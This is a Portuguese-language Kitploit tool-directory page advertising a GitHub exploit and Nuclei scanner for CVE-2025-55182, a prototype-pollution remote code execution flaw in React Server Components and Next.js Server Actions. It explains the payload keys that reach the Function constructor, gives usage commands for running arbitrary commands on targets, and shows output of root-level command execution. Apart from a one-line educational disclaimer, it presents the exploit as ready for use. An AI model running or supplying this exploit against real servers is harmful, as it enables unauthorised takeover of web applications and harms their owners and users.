Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface | Kitploit
Ferramentas/GitHubGitHub/sickwell/cve-2025-55182
Vulnerability ScannersCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubsickwell/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface

Ver Repositório
136há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 - Exploração de RCE em React & Next.js Server Actions

Exploit de execução remota de código e scanner completos para CVE-2025-55182 em React/Next.js Server Actions.

PoC Original: Spritualkb/CVE-2025-55182-exp

Visão Geral

CVE-2025-55182 é uma vulnerabilidade crítica de poluição de protótipo em React Server Components que permite execução remota de código. Este repositório fornece tanto ferramentas de varredura automatizada (template Nuclei) quanto de exploração manual (script Python).

Mecanismo da Vulnerabilidade:

O exploit explora a poluição de protótipo na desserialização do React Flight Protocol. Ele polui Object.prototype.then através de "$1:__proto__:then" e obtém acesso ao construtor de Functions através de _formData.get definido como "$1:constructor:constructor", depois injeta código malicioso via _prefix que é executado por Function().

Ferramentas

1. Template Nuclei (cve-2025-55182.yaml)

Scanner automatizado de vulnerabilidades que executa o comando id e recupera a saída através do cabeçalho X-Action-Redirect.

Uso:

root@kitploit:~
nuclei -u http://target.com:3000 -t cve-2025-55182.yaml

Funcionalidades:

  • Executa comando de teste (id) para verificar RCE
  • Extrai a saída do comando dos cabeçalhos de resposta
  • Múltiplos indicadores de detecção (status 303, cabeçalhos de redirecionamento, padrões de erro)

2. Exploit Python RCE (CVE-2025-55182.py)

Script de exploit RCE completo que executa comandos arbitrários e recupera a saída.

Uso:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Funcionalidades:

  • Executa comandos arbitrários
  • Extração automática da saída do cabeçalho X-Action-Redirect
  • Suporte aos formatos HTTP/HTTPS e IP:PORT
  • Opção de ignorar verificação de certificado SSL
  • Saída limpa e formatada

Resultados de Teste

Template Nuclei

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Varredura concluída em 28.35483ms. 1 correspondência encontrada.

Exploit Python

root@kitploit:~
$ python3 CVE-2025-55182.py http://localhost:3001 -c "id"

============================================================
CVE-2025-55182 RCE Exploit
React Server Components Remote Code Execution
============================================================

[*] Alvo: http://localhost:3001
[*] Comando: id
[*] Construindo payload...
[*] Enviando payload do exploit...

============================================================
[+] Comando executado com sucesso!
============================================================
[+] Saída do Comando:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
------------------------------------------------------------

============================================================
[*] Tentativa de exploração concluída
============================================================

Versões Afetadas

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (App Router com Server Actions)

Créditos

  • PoC Original: Spritualkb - CVE-2025-55182-exp

Referências

  • Comunicado de Segurança do React
  • GitHub do Next.js

Aviso de Isenção de Responsabilidade

APENAS PARA FINS EDUCACIONAIS E TESTES AUTORIZADOS

Baixar ferramenta